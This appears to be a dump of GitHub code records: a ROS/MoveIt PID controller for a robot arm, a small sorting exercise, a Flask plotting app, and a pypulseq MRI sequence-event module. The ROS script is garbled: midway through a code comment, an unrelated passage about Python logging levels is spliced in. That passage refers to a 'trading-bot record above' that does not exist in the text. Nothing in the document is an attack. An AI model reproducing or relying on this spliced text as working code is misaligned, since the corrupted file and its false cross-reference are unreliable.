previous_error,change_y,derivative,desiredAngle,Kp,Ki,Kd\n\tglobal robot, move_group,scene,display_trajectory_publisher,program_start,wpose\n\t#rospy.loginfo(\"I heard %s\", data.data)\n\tactualAngle=data.data\n\tError=desiredAngle- actualAngle\n\tintegral=integral+Error\n\tderivative=Error-previous_error\n\tchange_y = (Kp * Error) + (Ki * integral) + (Kd * derivative) \n\t# Set Max Range for change_y and yout\n\n\t#wpose = move_group.get_current_pose().pose\n\t\t\n\tcurrent_y=0\n\t\n\tpose_goal = geometry_msgs.msg.Pose()\n\tpose_goal.orientation.x = wpose.orientation.x\n\tpose_goal.orientation.y = wpose.orientation.y\n\tpose_goal.orientation.z = wpose.orientation.z\n\tpose_goal.orientation.w = wpose.orientation.w\n\tpose_goal.position.x = wpose.position.x\n\tpose_goal.position.y = wpose.position.y+change_y\n\tpose_goal.position.z = wpose.position.z\n\tmove_group.set_pose_target(pose_goal)\n\t#move_group.set_named_target(\"test1\")\n\t\n\tplan = move_group.plan()\n\tmove_group.go(wait=True)\n\t# Calling `stop()` ensures that there is no residual movement\n\t#move_group.stop()\n\t# It is always good to clear your targets after planning with poses.\n\t# Note: there is no equivalent function for clear_joint_value_targets()\n\t#move_group.clear_pose_targets()\n\t#move_group.execute(plan, wait=True)\n\n\trospy.loginfo(change_y)\n\t#wpose2=move_group.get_current_pose().pose\n\t#print(wpose2)\n\n\tprevious_angle=actualAngle\n\tprevious_error=Error\n\t#figure = pyplot.figure()\n\n\t#time_instant=time.time()\n\t#time_var=int(time_instant-program_start)\n\t#plt.axis([0, time_var,-30, 30])\n\t#x_data.append(time_var)\n\t#y_data.append(data.data)\n\t#plt.plot(x_data, y_data)\n\t#plt.pause(0.0000001) #Note this 
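In the trading-bot record above, the logger itself is capped at INFO while its file handler asks for DEBUG, so DEBUG records never reach the file: a record must pass the logger's level before any handler sees it, then each handler applies its own threshold. A minimal sketch of that interplay, with in-memory streams standing in for the console and file:

```python
import io
import logging

logger = logging.getLogger("demo")
logger.setLevel(logging.DEBUG)   # gatekeeper: let everything through to handlers

buf_info, buf_debug = io.StringIO(), io.StringIO()
h_info = logging.StreamHandler(buf_info)
h_info.setLevel(logging.INFO)    # this handler drops DEBUG records
h_debug = logging.StreamHandler(buf_debug)
h_debug.setLevel(logging.DEBUG)
logger.addHandler(h_info)
logger.addHandler(h_debug)

logger.debug("wire payload")     # reaches only the DEBUG handler
logger.info("order filled")      # reaches both handlers

assert "wire payload" not in buf_info.getvalue()
assert "wire payload" in buf_debug.getvalue()
```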
correction\n\t#figure.gca().relim()\n\t#figure.gca().autoscale_view()\n\t#print data.data\n\t\n\t#plt.show()\n\t\n\n\n\n \ndef listener():\n\tglobal robot, move_group,scene,display_trajectory_publisher,wpose\n\n\trospy.init_node('controller', anonymous=True)\n\tmoveit_commander.roscpp_initialize(sys.argv)\n\trobot = moveit_commander.RobotCommander()\n\tscene = moveit_commander.PlanningSceneInterface()\n\tgroup_name = \"manipulator\"\n\tmove_group = moveit_commander.MoveGroupCommander(group_name)\n\t# Display trajectories in Rviz\n\tdisplay_trajectory_publisher = rospy.Publisher('/move_group/display_planned_path',moveit_msgs.msg.DisplayTrajectory,queue_size=20)\n\t#joint_goal = move_group.get_current_joint_values()\n\twpose = move_group.get_current_pose().pose\n\tprint(wpose)\n\trospy.Subscriber(\"/angle_topic\", Float64, callback)\n\t# spin() simply keeps python from exiting until this node is stopped\n\trospy.spin()\n\nif __name__ == '__main__':\n listener()","repo_name":"indraneelpatil/bottleneck_guided_rrt","sub_path":"abb_manipulator/scripts/controller.py","file_name":"controller.py","file_ext":"py","file_size_in_byte":3347,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"60"} +{"seq_id":"18158636655","text":"arr = list(map(int,input().split()))\n\nlist1 = [1,2,3,4,5,6,7,8]\nlist2 = [8,7,6,5,4,3,2,1]\n\nif list1 == arr:\n print('ascending')\nelif list2 == arr:\n print('descending')\nelse:\n print('mixed')\n","repo_name":"Kyun2da/Algorithm","sub_path":"python/baekjoon/2920.py","file_name":"2920.py","file_ext":"py","file_size_in_byte":199,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"60"} +{"seq_id":"34290561278","text":"from flask import Flask\nimport visualize\nimport io\nfrom flask import Response, render_template, request\nfrom matplotlib.backends.backend_agg import FigureCanvasAgg as FigureCanvas\n\n\"\"\"\nFlask web app displaying a scatter plot using the visualize module.\n\"\"\"\n\napp = Flask(__name__)\n\n@app.route('/')\ndef landing():\n return render_template('selection.html')\n\n@app.route(\"/selection\", methods=['POST'])\ndef selection():\n imgsrc = 'static/images/image.png'\n first = request.form['first']\n second = request.form['second']\n third = request.form['third']\n visualize.visualize(first,second,third)[0].savefig(imgsrc) \n return render_template('draw.html', imgsrc = imgsrc)\n\n\nif __name__ == \"__main__\":\n app.run(debug=True)\n","repo_name":"Gaupemor/High-level_Python","sub_path":"assignment6/web_visualization.py","file_name":"web_visualization.py","file_ext":"py","file_size_in_byte":738,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"24970026072","text":"\"\"\"\nevent specific classes\n\n\"\"\"\nimport types\nimport typing\n\nimport matplotlib.pyplot as plt\nimport pypulseq as pp\n\nimport numpy as np\nimport rf_pulse_files as rfpf\nimport logging\nimport copy\n\nlogModule = logging.getLogger(__name__)\n\n\nclass Event:\n def __init__(self):\n self.t_duration_s: float = 0.0\n self.system: pp.Opts = NotImplemented\n\n def get_duration(self):\n raise NotImplementedError\n\n def to_simple_ns(self):\n raise NotImplementedError\n\n def copy(self):\n return copy.deepcopy(self)\n\n\nclass RF(Event):\n def __init__(self):\n super().__init__()\n self.flip_angle_deg: typing.Union[float, np.ndarray] = 0.0\n self.phase_deg: typing.Union[float, np.ndarray] = 0.0\n self.pulse_type: str = \"exc\"\n self.extRfFile: str 
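The ROS `callback` above folds the PID law and the MoveIt pose command into one function. A standalone sketch of just the controller arithmetic, reusing the same gains; the decaying error sequence is a simulation stub, no ROS required:

```python
Kp, Ki, Kd = 0.02, 0.001, 0.0015   # gains from the controller script above

def make_pid(kp: float, ki: float, kd: float, setpoint: float = 0.0):
    state = {"integral": 0.0, "prev_err": 0.0}
    def step(measurement: float) -> float:
        err = setpoint - measurement
        state["integral"] += err                 # accumulated error term
        deriv = err - state["prev_err"]          # finite-difference derivative
        state["prev_err"] = err
        return kp * err + ki * state["integral"] + kd * deriv
    return step

pid = make_pid(Kp, Ki, Kd)
for angle in (10.0, 8.0, 5.0, 2.0):   # measured angles converging to the setpoint
    print(round(pid(angle), 4))       # correction applied to the y position
```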
= \"\"\n\n self.flip_angle_rad: typing.Union[float, np.ndarray] = self.flip_angle_deg / 180.0 * np.pi\n self.phase_rad: typing.Union[float, np.ndarray] = self.phase_deg / 180.0 * np.pi\n\n self.freq_offset_hz: float = 0.0\n self.phase_offset_rad: float = 0.0\n\n self.t_delay_s: float = 0.0\n self.t_ringdown_s: float = 0.0\n self.t_dead_time_s: float = 0.0\n self.t_array_s: np.ndarray = np.zeros(0)\n\n self.bandwidth_hz: float = 0.0\n self.time_bandwidth: float = 0.0\n\n self.signal: np.ndarray = np.zeros(0, dtype=complex)\n\n @classmethod\n def load_from_rfpf(cls, fname: str, flip_angle_rad: float, phase_rad: float, system: pp.Opts,\n duration_s: float = 2e-3, delay_s: float = 0.0, pulse_type: str = 'excitation'):\n rf_instance = cls()\n rf_instance.system = system\n rf = rfpf.RF.load(fname)\n rf_instance.extRfFile = fname\n rf_instance.pulse_type = pulse_type\n\n # get signal envelope\n signal = rf.amplitude * np.exp(1j * rf.phase)\n # calculate raster with assigned duration, we set the signal to be rastered on rf raster of 1 us\n delta_t = system.rf_raster_time\n t_array_s = rf_instance.set_on_raster(np.arange(0, int(duration_s * 1e6)) * 1e-6)\n # interpolate signal to new time\n signal_interp = np.interp(\n t_array_s,\n xp=np.linspace(0, duration_s, rf.num_samples),\n fp=signal\n )\n\n # normalise flip angle\n flip = np.sum(np.abs(signal_interp)) * delta_t * 2 * np.pi\n\n # assign values\n rf_instance.signal = signal_interp * flip_angle_rad / flip\n rf_instance.flip_angle_rad = flip_angle_rad\n rf_instance.flip_angle_deg = flip_angle_rad / np.pi * 180.0\n\n rf_instance.phase_rad = phase_rad\n rf_instance.phase_deg = phase_rad / np.pi * 180.0\n\n rf_instance.t_duration_s = duration_s\n rf_instance.time_bandwidth = rf.time_bandwidth\n rf_instance.bandwidth_hz = rf_instance.time_bandwidth / duration_s\n rf_instance.t_array_s = t_array_s\n\n rf_instance.t_delay_s = delay_s\n rf_instance.t_ringdown_s = system.rf_ringdown_time\n rf_instance.t_dead_time_s = system.rf_dead_time\n return rf_instance\n\n @classmethod\n def make_sinc_pulse(cls, flip_angle_rad: float, system: pp.Opts, phase_rad: float = 0.0,\n pulse_type: str = 'excitation',\n delay_s: float = 0.0, duration_s: float = 2e-3,\n freq_offset_hz: float = 0.0, phase_offset_rad: float = 0.0,\n time_bw_prod: float = 2):\n rf_instance = cls()\n rf_instance.system = system\n rf_simple_ns = pp.make_sinc_pulse(\n use=pulse_type,\n flip_angle=flip_angle_rad,\n delay=delay_s,\n duration=duration_s,\n freq_offset=freq_offset_hz,\n phase_offset=phase_offset_rad + phase_rad,\n return_gz=False,\n time_bw_product=time_bw_prod,\n system=system\n )\n rf_instance.flip_angle_deg = flip_angle_rad * 180.0 / np.pi\n rf_instance.phase_deg = phase_offset_rad * 180.0 / np.pi\n rf_instance.pulse_type = pulse_type\n rf_instance.extRfFile = \"\"\n\n rf_instance.flip_angle_rad = flip_angle_rad\n rf_instance.phase_rad = phase_rad\n\n rf_instance.freq_offset_hz = freq_offset_hz\n rf_instance.phase_offset_rad = phase_offset_rad\n\n rf_instance.t_delay_s = delay_s\n rf_instance.t_duration_s = duration_s\n rf_instance.t_ringdown_s = system.rf_ringdown_time\n rf_instance.t_dead_time_s = system.rf_dead_time\n rf_instance.t_array_s = rf_instance.set_on_raster(np.linspace(0, duration_s, rf_simple_ns.signal.shape[0]))\n\n rf_instance.bandwidth_hz = time_bw_prod / duration_s\n rf_instance.time_bandwidth = time_bw_prod\n\n rf_instance.signal = rf_simple_ns.signal\n rf_instance.system = system\n return rf_instance\n\n @classmethod\n def make_gauss_pulse(cls, flip_angle_rad: 
float, system: pp.Opts, phase_rad: float = 0.0,\n pulse_type: str = 'excitation',\n delay_s: float = 0.0, duration_s: float = 2e-3,\n freq_offset_hz: float = 0.0, phase_offset_rad: float = 0.0,\n time_bw_prod: float = 2):\n rf_instance = cls()\n rf_instance.system = system\n rf_simple_ns = pp.make_gauss_pulse(\n use=pulse_type,\n flip_angle=flip_angle_rad,\n delay=delay_s,\n duration=duration_s,\n freq_offset=freq_offset_hz,\n phase_offset=phase_offset_rad + phase_rad,\n return_gz=False,\n time_bw_product=time_bw_prod,\n system=system\n )\n rf_instance.flip_angle_deg = flip_angle_rad * 180.0 / np.pi\n rf_instance.phase_deg = phase_offset_rad * 180.0 / np.pi\n rf_instance.pulse_type = pulse_type\n rf_instance.extRfFile = \"\"\n\n rf_instance.flip_angle_rad = flip_angle_rad\n rf_instance.phase_rad = phase_rad\n\n rf_instance.freq_offset_hz = freq_offset_hz\n rf_instance.phase_offset_rad = phase_offset_rad\n\n rf_instance.t_delay_s = delay_s\n rf_instance.t_duration_s = duration_s\n rf_instance.t_ringdown_s = system.rf_ringdown_time\n rf_instance.t_dead_time_s = system.rf_dead_time\n rf_instance.t_array_s = rf_instance.set_on_raster(np.linspace(0, duration_s, rf_simple_ns.signal.shape[0]))\n\n rf_instance.bandwidth_hz = time_bw_prod / duration_s\n rf_instance.time_bandwidth = time_bw_prod\n\n rf_instance.signal = rf_simple_ns.signal\n rf_instance.system = system\n return rf_instance\n\n def get_duration(self):\n return self.t_delay_s + self.t_duration_s + self.t_ringdown_s\n\n def set_on_raster(self, input_value: typing.Union[int, float, np.ndarray]):\n is_single = isinstance(input_value, (int, float))\n if is_single:\n us_value = np.array(input_value) * 1e6\n else:\n us_value = 1e6 * input_value\n us_raster = 1e6 * self.system.rf_raster_time\n choice = us_value % us_raster\n us_value[choice < 1e-4] = us_value[choice < 1e-4]\n us_value[choice > 1e-4] = np.round(us_value[choice > 1e-4] / us_raster) * us_raster\n if is_single:\n return 1e-6 * us_value[0]\n else:\n return 1e-6 * us_value\n\n def to_simple_ns(self):\n return types.SimpleNamespace(\n use=self.pulse_type, dead_time=self.t_dead_time_s, delay=self.t_delay_s,\n freq_offset=self.freq_offset_hz, phase_offset=self.phase_offset_rad,\n ringdown_time=self.t_ringdown_s, shape_dur=self.t_duration_s,\n signal=self.signal, t=self.t_array_s,\n type='rf'\n )\n\n def calculate_center(self):\n \"\"\"\n calculate the central point of rf shape\n for now assume middle, but can extend to max\n \"\"\"\n return self.t_duration_s / 2\n\n def plot(self):\n fig = plt.figure()\n ax = fig.add_subplot()\n amplitude = np.abs(self.signal)\n phase = np.angle(self.signal) + self.phase_rad\n ax.plot(np.linspace(0, self.t_duration_s, self.signal.shape[0]), amplitude, label='amp')\n ax.plot(np.linspace(0, self.t_duration_s, self.signal.shape[0]), phase, label='phase')\n ax.legend()\n plt.show()\n\n\nclass GRAD(Event):\n def __init__(self):\n super().__init__()\n self.channel: str = 'z'\n self.amplitude: typing.Union[float, np.ndarray] = 0.0\n self.area: typing.Union[float,np.ndarray] = 0.0\n self.flat_area: float = 0.0\n\n self.t_array_s: np.ndarray = np.zeros(0)\n self.t_delay_s: float = 0.0\n self.t_fall_time_s = 1e-5\n self.t_rise_time_s = 1e-5\n self.t_flat_time_s = 1e-5\n\n self.system: pp.Opts = pp.Opts()\n\n self.max_slew: float = self.system.max_slew\n self.max_grad: float = self.system.max_grad\n\n # needed in this project for referencing slice select extended gradients. 
easy hack\n self.slice_select_amplitude: float = NotImplemented\n self.slice_select_duration: float = NotImplemented\n\n def set_on_raster(self, value: float, return_delay: bool = False, double: bool = True):\n raster_time = float(self.system.grad_raster_time)\n if double:\n # helps with maintaining raster when calculating esp\n raster_time *= 2.0\n if np.abs(value) % raster_time < 1e-9:\n rastered_value = value\n else:\n rastered_value = np.ceil(value / raster_time) * raster_time\n if not return_delay:\n return rastered_value\n else:\n delay = (rastered_value - value) / 2\n return rastered_value, delay\n\n @classmethod\n def make_trapezoid(cls, channel: str, system: pp.Opts, amplitude: float = 0.0, area: float = None,\n delay_s: float = 0.0, duration_s: float = 0.0,\n flat_area: float = 0.0, flat_time: float = -1.0,\n rise_time: float = 0.0):\n grad_instance = cls()\n grad_instance.system = system\n # some timing checks\n if flat_time > 1e-7:\n flat_time = grad_instance.set_on_raster(flat_time, double=False)\n if duration_s > 1e-7:\n duration_s = grad_instance.set_on_raster(duration_s, double=False)\n if rise_time > 1e-7:\n rise_time = grad_instance.set_on_raster(rise_time, double=False)\n\n grad_simple_ns = pp.make_trapezoid(\n channel=channel,\n amplitude=amplitude,\n area=area,\n delay=delay_s,\n duration=duration_s,\n flat_area=flat_area,\n flat_time=flat_time,\n rise_time=rise_time,\n system=system\n )\n grad_instance.channel = channel\n grad_instance.amplitude = np.array([\n 0.0, grad_simple_ns.amplitude,\n grad_simple_ns.amplitude, 0.0\n ])\n grad_instance.area = grad_simple_ns.area\n grad_instance.flat_area = grad_simple_ns.flat_area\n\n grad_instance.t_array_s = np.array([\n 0.0, grad_simple_ns.rise_time,\n grad_simple_ns.rise_time + grad_simple_ns.flat_time,\n grad_simple_ns.rise_time + grad_simple_ns.flat_time + grad_simple_ns.fall_time\n ])\n grad_instance.t_delay_s = delay_s\n grad_instance.t_fall_time_s = rise_time\n grad_instance.t_rise_time_s = rise_time\n grad_instance.t_flat_time_s = flat_time\n\n grad_instance.system = system\n\n grad_instance.max_slew = system.max_slew\n grad_instance.max_grad = system.max_grad\n grad_instance.t_duration_s = grad_instance.get_duration()\n return grad_instance\n\n @classmethod\n def make_slice_selective(\n cls, pulse_bandwidth_hz: float, slice_thickness_m: float, duration_s: float,\n system: pp.Opts, pre_moment: float = 0.0, re_spoil_moment: float = 0.0,\n rephase: float = 0.0, t_minimum_re_grad: float = 0.0, adjust_ramp_area: float = 0.0):\n \"\"\"\n create slice selective gradient with merged pre and re moments (optional)\n - one can set the minimum time for those symmetrical moments with t_minimum_re_grad to match other grad timings\n - the rephase parameter gives control over rephasing the slice select moment in the re-moment.\n It can be helpful to introduce correction factors: rephase = 1.0 will do\n conventional rephasing of half of the slice select area.\n From simulations it was found that eg. for one particular used slr pulse an increase of 8%\n gives better phase properties. 
hence one could use rephase=1.08.\n - adjust_ramp_area gives control over additional adjustments.\n In the jstmc implementation this is used to account for the ramp area of a successive slice select pulse\n \"\"\"\n\n # init\n grad_instance = cls()\n grad_instance.system = system\n duration_s, rf_raster_delay = grad_instance.set_on_raster(duration_s, return_delay=True)\n # set slice select amplitude\n amplitude = pulse_bandwidth_hz / slice_thickness_m\n amps = [0.0]\n times = [0.0]\n areas = []\n # set ramp times to max grad/ slew rate + 2%. could be optimized timing wise!\n t_ramp_unipolar = grad_instance.set_on_raster(1.02 * system.max_grad / system.max_slew)\n t_ramp_bipolar = grad_instance.set_on_raster(2.04 * system.max_grad / system.max_slew)\n t_minimum_re_grad = grad_instance.set_on_raster(t_minimum_re_grad)\n\n # calculations\n def get_area_asym_grad(amp_h: float, time_h: float, time_htol: float, time_0toh: float = t_ramp_unipolar,\n amp_l: float = amplitude) -> float:\n \"\"\"\n we want to calculate the area / moment from an assymetric gradient part\n \"\"\"\n area = 0.5 * time_0toh * amp_h + time_h * amp_h + 0.5 * (amp_h - amp_l) * time_htol + time_htol * amp_l\n return area\n\n def get_asym_grad_amplitude(\n duration: float, moment: float,\n t_asym_ramp: float = t_ramp_unipolar, t_zero_ramp: float = t_ramp_unipolar,\n asym_amplitude: float = amplitude) -> float:\n \"\"\"\n calculate the amplitude of re/pre gradient given ramp times to 0 and to the slice select amplitude,\n respectively and a duration\n \"\"\"\n return (moment - asym_amplitude * t_asym_ramp / 2) / (duration - t_asym_ramp / 2 - t_zero_ramp / 2)\n\n def get_asym_grad_min_duration(max_amplitude: float, moment: float,\n t_asym_ramp: float = t_ramp_unipolar, t_zero_ramp: float = t_ramp_unipolar,\n asym_amplitude: float = amplitude) -> (float, float):\n \"\"\"\n calculate the duration of the re/pre gradient given ramp times to 0 and slice select amplitude,\n respectively and a maximal re/pre gradient amplitude\n \"\"\"\n t_min_duration = grad_instance.set_on_raster(\n (moment - asym_amplitude * t_asym_ramp / 2) / max_amplitude + t_asym_ramp / 2 + t_zero_ramp / 2\n )\n if np.abs(get_area_asym_grad(\n amp_h=max_amplitude, time_h=t_min_duration - t_asym_ramp - t_zero_ramp,\n time_htol=t_asym_ramp, time_0toh=t_zero_ramp, amp_l=asym_amplitude)) - np.abs(moment) > 0:\n # absolute moment was increased, possibly due to np.ceil call in set raster time.\n # apparent prolonging of timing, we can pull it back by slight decreasing of amplitude\n max_amplitude = get_asym_grad_amplitude(\n duration=t_min_duration, moment=moment,\n t_asym_ramp=t_asym_ramp, t_zero_ramp=t_zero_ramp, asym_amplitude=asym_amplitude\n )\n return t_min_duration, max_amplitude\n\n # pre moment\n if np.abs(pre_moment) > 1e-7:\n # add to area array\n areas.append(pre_moment)\n # we assume moment of slice select and pre phaser to act in same direction\n if np.sign(pre_moment) != np.sign(amplitude):\n logModule.error(f\"pre-phase / spoil pre -- slice select not optimized for opposite sign grads\")\n # we can adopt here also with doubling the ramp times in case we have opposite signs\n # want to minimize timing of gradient - use max grad\n pre_grad_amplitude = np.sign(pre_moment) * system.max_grad\n duration_pre_grad, pre_grad_amplitude = get_asym_grad_min_duration(max_amplitude=pre_grad_amplitude,\n moment=pre_moment)\n if duration_pre_grad < t_minimum_re_grad:\n # stretch to minimum required time\n duration_pre_grad = t_minimum_re_grad\n pre_grad_amplitude = 
get_asym_grad_amplitude(duration=duration_pre_grad, moment=pre_moment)\n pre_t_flat = grad_instance.set_on_raster(duration_pre_grad - 2 * t_ramp_unipolar)\n amps.extend([pre_grad_amplitude, pre_grad_amplitude, amplitude])\n times.extend([t_ramp_unipolar, t_ramp_unipolar + pre_t_flat, duration_pre_grad])\n else:\n # ramp up only, no pre moment\n duration_pre_grad = grad_instance.set_on_raster(np.abs(amplitude / system.max_slew))\n times.append(duration_pre_grad)\n amps.append(amplitude)\n # flat part of slice select gradient. an rf would start here, hence save delay\n delay = times[-1] + rf_raster_delay\n amps.append(amplitude)\n times.append(duration_pre_grad + duration_s)\n areas.append(amplitude * duration_s)\n t = duration_pre_grad + duration_s\n re_start_time = t\n # re / spoil moment\n if np.abs(re_spoil_moment) > 1e-7:\n if np.sign(re_spoil_moment) != np.sign(amplitude):\n logModule.error(f\"pre-phase / spoil pre -- slice select not optimized for opposite sign grads\")\n # we can adopt here also with doubling the ramp times in case we have opposite signs\n t_ramp_asym = t_ramp_unipolar\n re_spoil_moment += - 0.5 * rephase * areas[-1]\n # very specific requirement jstmc sequence. adjust for ramp up of next slice selective gradient\n re_spoil_moment -= adjust_ramp_area\n if np.sign(re_spoil_moment) != np.sign(amplitude):\n # set up ramp for this case - just choose double the ramp time to account for complete gradient swing\n t_ramp_asym = t_ramp_bipolar\n areas.append(re_spoil_moment)\n if t_minimum_re_grad > 1e-6:\n # duration given - use symmetrical timing : same time as re gradient\n duration_re_grad = grad_instance.set_on_raster(t_minimum_re_grad)\n if t_ramp_unipolar > duration_re_grad:\n err = \"ramp times longer than available gradient time, slew rate limit\"\n logModule.error(err)\n raise ValueError(err)\n # we want to fit the pre moment into the given duration\n # i.e. 
ramp 0 to pre_amplitude, flat time, ramp pre_amplitude to amplitude\n                re_grad_amplitude = get_asym_grad_amplitude(\n                    duration=duration_re_grad, moment=re_spoil_moment,\n                    t_asym_ramp=t_ramp_asym)\n                # but if that exceeds the grad limit we need to prolong the time\n                if np.abs(re_grad_amplitude) > system.max_grad:\n                    re_grad_amplitude = np.sign(re_spoil_moment) * system.max_grad\n                    duration_re_grad, re_grad_amplitude = get_asym_grad_min_duration(\n                        max_amplitude=re_grad_amplitude, moment=re_spoil_moment, t_asym_ramp=t_ramp_asym)\n                re_t_flat = grad_instance.set_on_raster(duration_re_grad - t_ramp_unipolar - t_ramp_asym)\n                amps.extend([re_grad_amplitude, re_grad_amplitude])\n                times.extend([t + t_ramp_asym, t + t_ramp_asym + re_t_flat])\n            else:\n                # want to minimize timing of gradient - use max grad\n                re_grad_amplitude = np.sign(re_spoil_moment) * system.max_grad\n                duration_re_grad, re_grad_amplitude = get_asym_grad_min_duration(\n                    max_amplitude=re_grad_amplitude, moment=re_spoil_moment, t_asym_ramp=t_ramp_asym\n                )\n                re_t_flat = grad_instance.set_on_raster(duration_re_grad - t_ramp_asym - t_ramp_unipolar)\n                if re_t_flat > 1e-7:\n                    amps.extend([re_grad_amplitude, re_grad_amplitude])\n                    times.extend([t + t_ramp_asym, t + t_ramp_asym + re_t_flat])\n                else:\n                    # can happen with small moments, since the above calculations do not take into account a 0 flat time\n                    # we need to recalculate the gradient needed for only the ramps.\n                    re_grad_amplitude = amplitude\n                    ramp_time = grad_instance.set_on_raster(np.abs(re_spoil_moment * 2 / re_grad_amplitude))\n                    min_ramp_time = grad_instance.set_on_raster(np.abs(amplitude / system.max_slew))\n                    if min_ramp_time > ramp_time:\n                        warn = f\"rephasing area low, need only a ramp. \" \\\n                               f\"ramp slew rate too high, revert to maximal possible \" \\\n                               f\"-> can lead to slight deviations in ramp area! 
change spoiling gradient to avoid!\"\n                        logModule.warning(warn)\n                        ramp_time = min_ramp_time\n                    duration_re_grad = ramp_time\n            t += duration_re_grad\n        else:\n            t += grad_instance.set_on_raster(np.abs(amplitude / system.max_slew))\n        # ramp down\n        amps.append(0.0)\n        times.append(t)\n\n        # end of re gradient\n        re_end_time = t\n        duration_re_grad = float(re_end_time - re_start_time)\n        amps = np.array(amps)\n        times = np.array(times)\n\n        grad_instance.channel = 'z'\n        grad_instance.amplitude = np.array(amps)\n        grad_instance.area = np.array(areas)\n        grad_instance.flat_area = np.zeros(3)\n\n        grad_instance.t_array_s = times\n        grad_instance.t_delay_s = 0.0\n        grad_instance.t_fall_time_s = times[-1] - times[-2]\n        grad_instance.t_rise_time_s = times[1] - times[0]\n        grad_instance.t_flat_time_s = 0.0\n\n        # for referencing slice selective part:\n        grad_instance.slice_select_duration = duration_s\n        grad_instance.slice_select_amplitude = amplitude\n\n        grad_instance.system = system\n\n        grad_instance.max_slew = system.max_slew\n        grad_instance.max_grad = system.max_grad\n        grad_instance.t_duration_s = grad_instance.get_duration()\n        # last sanity check max grad / slew times\n        if np.max(np.abs(amps)) > system.max_grad:\n            err = f\"amplitude violation, maximum gradient exceeded\"\n            logModule.error(err)\n            raise ValueError(err)\n        grad_slew = np.abs(np.diff(amps) / np.diff(times))\n        if np.max(grad_slew) > system.max_slew:\n            err = f\"slew rate violation, maximum slew rate exceeded\"\n            logModule.error(err)\n            raise ValueError(err)\n\n        return grad_instance, delay, duration_re_grad\n\n    @classmethod\n    def sym_grad(cls, system: pp.Opts, channel: str = 'x', pre_delay: float = 0.0, area_lobe: float = 0.0,\n                 amplitude_lobe: float = 0.0, duration_lobe: float = 0.0, duration_between: float = 0.0,\n                 reverse_second_lobe: bool = False):\n        grad_instance = cls()\n        grad_instance.system = system\n        duration_lobe = grad_instance.set_on_raster(float(duration_lobe))\n        duration_between = grad_instance.set_on_raster(duration_between)\n\n        grad_ns = pp.make_trapezoid(\n            channel=channel, area=area_lobe, amplitude=amplitude_lobe, duration=duration_lobe, system=system\n        )\n\n        # set up arrays\n        grad_instance.t_delay_s = pre_delay\n        times = np.array([\n            0.0,\n            grad_ns.rise_time,\n            grad_ns.rise_time + grad_ns.flat_time,\n            duration_lobe,\n            duration_lobe + duration_between,\n            duration_lobe + duration_between + grad_ns.rise_time,\n            duration_lobe + duration_between + grad_ns.rise_time + grad_ns.flat_time,\n            2 * duration_lobe + duration_between,\n        ])\n        # for second lobe\n        sign = 1\n        if reverse_second_lobe:\n            sign *= -1\n        amps = np.array([\n            0.0,\n            grad_ns.amplitude,\n            grad_ns.amplitude,\n            0.0,\n            0.0,\n            sign * grad_ns.amplitude,\n            sign * grad_ns.amplitude,\n            0.0\n        ])\n\n        areas = [grad_ns.area, 0, sign * grad_ns.area]\n\n        grad_instance.channel = channel\n        grad_instance.amplitude = np.array(amps)\n        grad_instance.area = np.array(areas)\n\n        grad_instance.t_array_s = times\n        grad_instance.t_fall_time_s = times[-1] - times[-2]\n        grad_instance.t_rise_time_s = times[1] - times[0]\n\n        grad_instance.system = system\n\n        grad_instance.max_slew = system.max_slew\n        grad_instance.max_grad = system.max_grad\n        grad_instance.t_duration_s = grad_instance.get_duration()\n        # last sanity check max grad / slew times\n        if np.max(np.abs(amps)) > system.max_grad:\n            err = f\"amplitude violation, maximum gradient exceeded\"\n            logModule.error(err)\n            raise ValueError(err)\n        grad_slew = np.abs(np.diff(amps) / np.diff(times))\n        if np.max(grad_slew) > system.max_slew:\n            
err = f\"slew rate violation, maximum slew rate exceeded\"\n logModule.error(err)\n raise ValueError(err)\n return grad_instance\n\n def get_duration(self):\n # 0 for empty init grad\n t = self.t_delay_s\n if self.t_array_s.__len__() < 1:\n return t\n return t + self.t_array_s[-1]\n\n def to_simple_ns(self):\n return types.SimpleNamespace(\n channel=self.channel, type='grad',\n delay=self.t_delay_s, first=self.amplitude[0], last=self.amplitude[-1],\n shape_dur=self.t_duration_s, tt=self.t_array_s, waveform=self.amplitude\n )\n\n def plot(self):\n fig = plt.figure()\n ax = fig.add_subplot()\n gamma = self.system.gamma\n amplitude = self.amplitude / gamma * 1e3\n ax.plot(self.t_array_s * 1e3, amplitude)\n ax.set_xlabel(\"time [ms]\")\n ax.set_ylabel(\"grad amp [mT/m]\")\n plt.show()\n\n def calculate_asym_area(self, forward: bool = True):\n amps = self.amplitude\n times = self.t_array_s\n if not forward:\n amps = amps[::-1]\n times = times[::-1]\n amplitude_a = amps[1]\n amplitude_b = amps[3]\n delta_t = np.abs(np.diff(times))[:3]\n factor = np.array([0.5, 1.0, 0.5])\n area = amplitude_a * np.sum(factor * delta_t) + amplitude_b * delta_t[2] / 2\n return area\n\n\nclass ADC(Event):\n def __init__(self):\n super().__init__()\n self.num_samples: int = 0\n\n self.t_dwell_s: float = 0.0\n self.t_delay_s: float = 0.0\n self.t_duration_s: float = 0.0\n self.t_dead_time_s: float = 0.0\n\n self.freq_offset_hz: float = 0.0\n self.phase_offset_rad: float = 0.0\n\n self.system: pp.Opts = pp.Opts()\n\n @classmethod\n def make_adc(cls, system: pp.Opts,\n num_samples: int = 0, delay_s: float = 0, duration_s: float = 0,\n dwell: float = 0, freq_offset_hz: float = 0, phase_offset_rad: float = 0.0\n ):\n adc_ns = pp.make_adc(\n num_samples=num_samples,\n delay=delay_s,\n duration=duration_s,\n dwell=dwell,\n freq_offset=freq_offset_hz,\n phase_offset=phase_offset_rad,\n system=system\n )\n adc_instance = cls()\n adc_instance.system = system\n adc_instance.num_samples = adc_ns.num_samples\n adc_instance.t_delay_s = adc_ns.delay\n adc_instance.t_dwell_s = adc_ns.dwell\n adc_instance.t_duration_s = adc_ns.dwell * adc_ns.num_samples\n adc_instance.t_dead_time_s = adc_ns.dead_time\n adc_instance.freq_offset_hz = adc_ns.freq_offset\n adc_instance.phase_offset_rad = adc_ns.phase_offset\n adc_instance.set_on_raster()\n return adc_instance\n\n def get_duration(self):\n return self.t_duration_s + self.t_delay_s\n\n def to_simple_ns(self):\n return types.SimpleNamespace(\n dead_time=self.t_dead_time_s, delay=self.t_delay_s, dwell=self.t_dwell_s,\n freq_offset=self.freq_offset_hz, num_samples=self.num_samples,\n 